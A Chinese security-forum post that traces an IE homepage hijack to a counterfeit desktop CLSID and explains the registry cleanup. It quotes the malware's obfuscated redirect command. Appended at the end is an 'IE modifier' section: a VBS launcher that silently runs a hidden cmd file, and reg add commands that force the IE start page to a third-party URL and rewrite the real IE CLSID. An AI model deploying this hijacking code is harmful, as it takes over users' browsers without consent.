注册表-恶意首页追踪之旅(IE不能改主页)

恶意首页追踪之旅
(先说下,360无法修复这个恶意首页)

话说,今天下了个扫站的工具,结果一不小心中了恶意广告!

中招后不停的乱下东西安装,360不停的在那弹出提示!

无语了,一个个卸载,把C:\windows\svchost.exe 和 svcho.exe 删除,然后打上免疫!

可是打开IE就傻了,以前主页明明是hao123(呵呵,还是习惯导航老祖宗),打开却跳到了一个垃圾导航
http://06000.cn/xy.htm,这种恶意修改,看到就烦!

打开属性看主页,没问题啊..就是 hao123 !

懒的手动改,用360修复首页试了试,汗一个   ,没反应,看来只得动手了!

右键IE图标,点"属性"的确弹出的是设置属性对话框,而并非是个快捷方式传参式冒充,而且
主页就是hao123!

在注册表中搜 http://06000.cn/xy.htm 没有相关结果

再打开IE看看, 发现有跳转 先是 http://g1476.cn 然后才跳到 http://06000.cn/xy.htm

好,那就搜 g1476.cn

还是没结果!

MS还有点棘手, 打开桌面自定义,发现IE并未打勾,然后就打上勾保存,发现桌面多出了一个IE图标

还真是山寨,而且是仿真版的,平常都是个快捷方式,这回还出新花招了!

(右键点这个山寨IE, 菜单中有删除, 但删除没一点反应)

顺便说一下,桌面的 "我的电脑","回收站","IE" 并非是文件或文件夹(dir一下"%userprofile%\桌面"就知道了),
而是桌面特殊项,每一个都对应一个类标识符,相关信息存在注册表中!

定位到 桌面的特殊项
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID
瞅了下,没什么变化!

再定位到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace

问题出来了: {3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45} 这个好陌生

虽然桌面的特殊项没能力记忆下来,但是这个开头的{3D3D 一点印象都没

打开它的值,发现是 Internet Explorer

??? 难道记错了?

看来得确认一下IE的类标识到底是多少,把真正的IE名字改成Internet Explorers,
注册表中搜索新IE名字--Internet Explorers,

定位到了的真正的类标识符是 {871C5380-42A0-1069-A2EA-08002B30309D}

确定了,那个{3D3D..还真是高仿山寨!

到此,还不死心,还得看看它到底是怎么隐蔽修改我的IE首页:

到 HKEY_CLASSES_ROOT\CLSID 搜索{3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45}

出来了:

DefaultIcon 对应的IE图标项
shell\D\command 对应菜单中的删除选项(关联的程序是Rundll32.exe,没传参,这就是在在桌面右键删除山寨IE无效
的原因啦)
属性(&R) 对应的就是IE设置对话框 其值 为Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl
(就是打开IE设置的对话框了)
ShellFolder  里设定它的属性

open 这就是IE被窜改的根源了,它的 command值为

C:\Program Files\Internet Explorer\iexplore.exe %1 h%t%t%p%:%/%/%g%11%14%17%16%.%c%n%

好晕,又是这种密文,把%1 和%去掉 后就是恶意首页了 http://g1476.cn 大家可别上,小心中招!

到此,恶意修改的根源就抓到了!

解决方法:

搜索注册表,删除搜到的{3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45} 全部信息 即可!

首页被恶意窜改的手段很多...有时候工具也会失效,还得靠自己的双手!转载请注明出自饭客安全论坛 -  http://bbs.hackfans.com.cn/,本贴地址:http://bbs.hackfans.com.cn/viewthread.php?tid=45933

=====================================================================================

IE修改器

dat文件
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C C:\WINDOWS\home.cmd", 0, TRUE)

COM文件
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.2255.net/?ysd222 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.2255.net/?ysd222 /f
reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.2255.net/?ysd222" /f